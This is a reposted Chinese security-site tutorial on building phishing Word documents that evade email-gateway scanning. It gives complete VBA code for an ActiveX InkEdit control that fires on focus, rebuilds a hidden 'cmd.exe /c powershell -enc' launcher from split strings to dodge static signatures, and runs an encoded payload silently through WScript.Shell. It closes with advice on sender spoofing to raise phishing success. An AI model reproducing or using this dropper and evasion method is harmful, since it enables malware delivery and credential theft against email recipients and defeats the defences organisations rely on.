安基网 首页 安全 攻防案例 查看内容

利用绕过大部分邮件网关的姿势防止控件钓鱼

2020-2-8 14:29| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 钓鱼邮件作为APT常用手法之一,手法层出不穷,各大企业和组织的安全部门也把钓鱼防控列为重点。邮件网关防病毒,防垃圾各类防御设备能上的都上。防御设备虽多,但是为了业务需求,特别是邮件业务繁多的企业,邮件防 ...


前言


钓鱼邮件作为APT常用手法之一,手法层出不穷,各大企业和组织的安全部门也把钓鱼防控列为重点。邮件网关防病毒,防垃圾各类防御设备能上的都上。


防御设备虽多,但是为了业务需求,特别是邮件业务繁多的企业,邮件防御设备往往只开启了静态查杀或者特征查杀,均未开启沙箱动态查杀。


这里分享一个绕过大部分邮件网关的姿势。


钓鱼文档制


1.新建文档

这边以word为例,新建一个doc为后缀的word文档,之所以选doc因为doc相较于docm等后缀更具有迷惑性,兼容性也是超棒的。


1.2插入控件

点击开发工具→旧式窗体→更多控件

这里选Microsoft LnkEdit Control,选其他的也行,再配合上漏洞,如flash啥的。

属性如上图,双击控件,编辑代码


1.3代码编写(拼接)

由于杀软的特征库的日益完善,特别是工具生成的恶意代码,分分钟就被杀了,这时候我们就要想办法进行绕过查杀。

这里我们用代码拼接的方法。

拼接部分可以写在任意的地方,只要能够取值,如下图就把代码插在了控件的属性变量中。

完整代码如下

Private Sub InkEdit1_GotFocus()xiaojiangjj1cmApplication.DisplayAlerts = TrueEnd SubPrivate Sub xiaojiangjj1cm()Dim var_str, str00, str01, str2, str22str1 = "ell.exe -noP -sta -w 1 -enc xe /c powershcmd.e"str22 = Right(str1, 18)str2 = Right(str22, 5) & Mid(str22, 1, Len(str22) - 5) & Mid(str1, 1, Len(str1) - 18)str00 = InkEdit1.Textvar_str = str2 & str00Set ws = CreateObject("WScr" & "ipt.Sh" & "ell")ws.Run var_str, 0, FalseEnd Sub


为了更加客观,我们进行调试

可以看出正文用了多个变量进行拼接命令,甚至可以添加脏数据。

最后拼接处命令执行。


效果演示


点击前控件变成一个XX,我们可以在XX底下放张图片,根据钓鱼内容,使其更具迷惑性。

而且值得注意的是,安全警告不再是启用宏而是部分活动内容被禁用。

使其更具迷惑性

点击后

写在最后:


钓鱼文件混淆只要把恶意代码多分几块就可以轻松绕过各类静态查杀,再配合上发件人伪造(超链接),这样就可以使钓鱼邮件更具迷惑性,增加成功率。


本文作者:,转载自FreeBuf.COM



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6790654603663770125/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部